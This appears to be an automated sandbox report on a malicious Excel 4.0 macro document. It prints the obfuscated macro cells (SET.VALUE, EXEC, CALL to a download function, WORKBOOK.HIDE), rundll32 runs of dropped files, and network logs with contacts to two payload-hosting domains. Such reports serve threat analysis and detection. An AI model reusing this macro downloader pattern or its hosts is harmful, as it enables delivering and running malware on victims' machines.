                        ,,,,,,,,,,,,,,,,,r,",",U,J,,,=CHAR(85),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,u,D,R,J,,,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,ll,L,C,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,d,l,D,C,,,M,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,R,o,B,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,e,w,B,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,g,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,i,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,s,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,t,a,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e,d,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,T,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Se,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,rv,F,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,er,i,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=EXEC(before.3.4.35.sheet!AW26&AZ29&before.3.4.35.sheet!AW27)=EXEC(before.3.4.35.sheet!AW26&AZ30&before.3.4.35.sheet!AW27),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\oepddl.igk1,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\oepddl.igk2,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=before.3.4.35.sheet!AY25(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=SET.VALUE(AW22,BD5&BD6&BD7&BD8&BD9&BD10)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=SET.VALUE(AW23,BG5&BG6&BG7&BG8&BG9)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=SET.VALUE(AW24,BC5&BC6&BC7&BC8&BC9&BC10&BC11&BC12&BC13&BC14&BC15&BC16&BC17&BC18&BC19&BC20&BC21)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=SET.VALUE(AW26,before.3.4.35.sheet!BA5&before.3.4.35.sheet!BA6&before.3.4.35.sheet!BA7&before.3.4.35.sheet!BA8&before.3.4.35.sheet!BA9&before.3.4.35.sheet!BA10&before.3.4.35.sheet!BA11&""2 "")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=SET.VALUE(AW27,before.3.4.35.sheet!BB5&before.3.4.35.sheet!BB6&before.3.4.35.sheet!BB7&before.3.4.35.sheet!BB9&before.3.4.35.sheet!BB10&before.3.4.35.sheet!BB11&before.3.4.35.sheet!BB12&before.3.4.35.sheet!BB13&before.3.4.35.sheet!BB14&before.3.4.35.sheet!BB15&before.3.4.35.sheet!BB16&before.3.4.35.sheet!BB17&before.3.4.35.sheet!BB18&before.3.4.35.sheet!BB19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=WORKBOOK.HIDE(""Sheet2"",1)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=WORKBOOK.HIDE(""Sheet1"",1)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=WORKBOOK.HIDE(""Sheet3"",1)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=Sheet1!AS18(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                        "=CALL(Sheet2!AW23&""n"",Sheet2!AW24&""A"",Sheet2!AW22,Sheet2!BD15,Sheet3!A102,Sheet2!AZ29,0,0)=CALL(Sheet2!AW23&""n"",Sheet2!AW24&""A"",Sheet2!AW22,Sheet2!BD15,Sheet3!A103,Sheet2!AZ30,0,0)"=Sheet2!BD22()

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Apr 22, 2021 15:20:13.064034939 CEST49165443192.168.2.22162.241.225.246
                        Apr 22, 2021 15:20:13.222500086 CEST44349165162.241.225.246192.168.2.22
                        Apr 22, 2021 15:20:13.222590923 CEST49165443192.168.2.22162.241.225.246
                        Apr 22, 2021 15:20:13.244963884 CEST49165443192.168.2.22162.241.225.246
                        Apr 22, 2021 15:20:13.405527115 CEST44349165162.241.225.246192.168.2.22
                        Apr 22, 2021 15:20:13.417818069 CEST44349165162.241.225.246192.168.2.22
                        Apr 22, 2021 15:20:13.417856932 CEST44349165162.241.225.246192.168.2.22
                        Apr 22, 2021 15:20:13.417880058 CEST44349165162.241.225.246192.168.2.22
                        Apr 22, 2021 15:20:13.417937040 CEST49165443192.168.2.22162.241.225.246
                        Apr 22, 2021 15:20:13.417982101 CEST49165443192.168.2.22162.241.225.246
                        Apr 22, 2021 15:20:13.473000050 CEST49165443192.168.2.22162.241.225.246
                        Apr 22, 2021 15:20:13.672511101 CEST44349165162.241.225.246192.168.2.22
                        Apr 22, 2021 15:20:13.687685013 CEST44349165162.241.225.246192.168.2.22
                        Apr 22, 2021 15:20:13.687920094 CEST49165443192.168.2.22162.241.225.246
                        Apr 22, 2021 15:20:15.340213060 CEST49165443192.168.2.22162.241.225.246
                        Apr 22, 2021 15:20:15.498672962 CEST44349165162.241.225.246192.168.2.22
                        Apr 22, 2021 15:20:15.546745062 CEST44349165162.241.225.246192.168.2.22
                        Apr 22, 2021 15:20:15.546972990 CEST49165443192.168.2.22162.241.225.246
                        Apr 22, 2021 15:20:15.547231913 CEST49165443192.168.2.22162.241.225.246
                        Apr 22, 2021 15:20:15.548563957 CEST44349165162.241.225.246192.168.2.22
                        Apr 22, 2021 15:20:15.548679113 CEST49165443192.168.2.22162.241.225.246
                        Apr 22, 2021 15:20:15.620611906 CEST49168443192.168.2.225.100.155.169
                        Apr 22, 2021 15:20:15.675256968 CEST443491685.100.155.169192.168.2.22
                        Apr 22, 2021 15:20:15.675431013 CEST49168443192.168.2.225.100.155.169
                        Apr 22, 2021 15:20:15.676218987 CEST49168443192.168.2.225.100.155.169
                        Apr 22, 2021 15:20:15.707979918 CEST44349165162.241.225.246192.168.2.22
                        Apr 22, 2021 15:20:15.729274988 CEST443491685.100.155.169192.168.2.22
                        Apr 22, 2021 15:20:15.759604931 CEST443491685.100.155.169192.168.2.22
                        Apr 22, 2021 15:20:15.759644985 CEST443491685.100.155.169192.168.2.22
                        Apr 22, 2021 15:20:15.759669065 CEST443491685.100.155.169192.168.2.22
                        Apr 22, 2021 15:20:15.759727001 CEST49168443192.168.2.225.100.155.169
                        Apr 22, 2021 15:20:15.760545969 CEST49168443192.168.2.225.100.155.169
                        Apr 22, 2021 15:20:15.813174963 CEST49168443192.168.2.225.100.155.169
                        Apr 22, 2021 15:20:15.890568018 CEST443491685.100.155.169192.168.2.22
                        Apr 22, 2021 15:20:15.890659094 CEST49168443192.168.2.225.100.155.169
                        Apr 22, 2021 15:20:15.929043055 CEST49168443192.168.2.225.100.155.169
                        Apr 22, 2021 15:20:16.023185968 CEST443491685.100.155.169192.168.2.22
                        Apr 22, 2021 15:20:16.394433022 CEST443491685.100.155.169192.168.2.22
                        Apr 22, 2021 15:20:16.394469023 CEST443491685.100.155.169192.168.2.22
                        Apr 22, 2021 15:20:16.394613028 CEST49168443192.168.2.225.100.155.169
                        Apr 22, 2021 15:20:16.395162106 CEST49168443192.168.2.225.100.155.169
                        Apr 22, 2021 15:20:16.449620962 CEST443491685.100.155.169192.168.2.22

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Apr 22, 2021 15:20:12.899084091 CEST5219753192.168.2.228.8.8.8
                        Apr 22, 2021 15:20:13.049699068 CEST53521978.8.8.8192.168.2.22
                        Apr 22, 2021 15:20:14.053478956 CEST5309953192.168.2.228.8.8.8
                        Apr 22, 2021 15:20:14.103732109 CEST53530998.8.8.8192.168.2.22
                        Apr 22, 2021 15:20:14.110492945 CEST5283853192.168.2.228.8.8.8
                        Apr 22, 2021 15:20:14.162839890 CEST53528388.8.8.8192.168.2.22
                        Apr 22, 2021 15:20:14.726438046 CEST6120053192.168.2.228.8.8.8
                        Apr 22, 2021 15:20:14.786709070 CEST53612008.8.8.8192.168.2.22
                        Apr 22, 2021 15:20:14.797799110 CEST4954853192.168.2.228.8.8.8
                        Apr 22, 2021 15:20:14.859829903 CEST53495488.8.8.8192.168.2.22
                        Apr 22, 2021 15:20:15.559335947 CEST5562753192.168.2.228.8.8.8
                        Apr 22, 2021 15:20:15.618439913 CEST53556278.8.8.8192.168.2.22

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Apr 22, 2021 15:20:12.899084091 CEST192.168.2.228.8.8.80x73f5Standard query (0)abpandh.comA (IP address)IN (0x0001)
                        Apr 22, 2021 15:20:15.559335947 CEST192.168.2.228.8.8.80x8464Standard query (0)kamalandcompany.comA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Apr 22, 2021 15:20:13.049699068 CEST8.8.8.8192.168.2.220x73f5No error (0)abpandh.com162.241.225.246A (IP address)IN (0x0001)
                        Apr 22, 2021 15:20:15.618439913 CEST8.8.8.8192.168.2.220x8464No error (0)kamalandcompany.com5.100.155.169A (IP address)IN (0x0001)

                        HTTPS Packets

                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                        Apr 22, 2021 15:20:13.417880058 CEST162.241.225.246443192.168.2.2249165CN=webmail.abpandh.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat Feb 13 08:15:22 CET 2021 Wed Oct 07 21:21:40 CEST 2020Fri May 14 09:15:22 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                        CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                        Apr 22, 2021 15:20:15.759669065 CEST5.100.155.169443192.168.2.2249168CN=cpcalendars.kamalandcompany.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Mar 05 22:32:47 CET 2021 Wed Oct 07 21:21:40 CEST 2020Thu Jun 03 23:32:47 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                        CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                        Code Manipulations

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Start time:15:19:41
                        Start date:22/04/2021
                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        Wow64 process (32bit):false
                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                        Imagebase:0x13f640000
                        File size:27641504 bytes
                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:15:19:47
                        Start date:22/04/2021
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32 ..\oepddl.igk1,DllRegisterServer
                        Imagebase:0xffa80000
                        File size:45568 bytes
                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:15:19:48
                        Start date:22/04/2021
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32 ..\oepddl.igk2,DllRegisterServer
                        Imagebase:0xffa80000
                        File size:45568 bytes
                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Disassembly

                        Code Analysis

                        Reset < >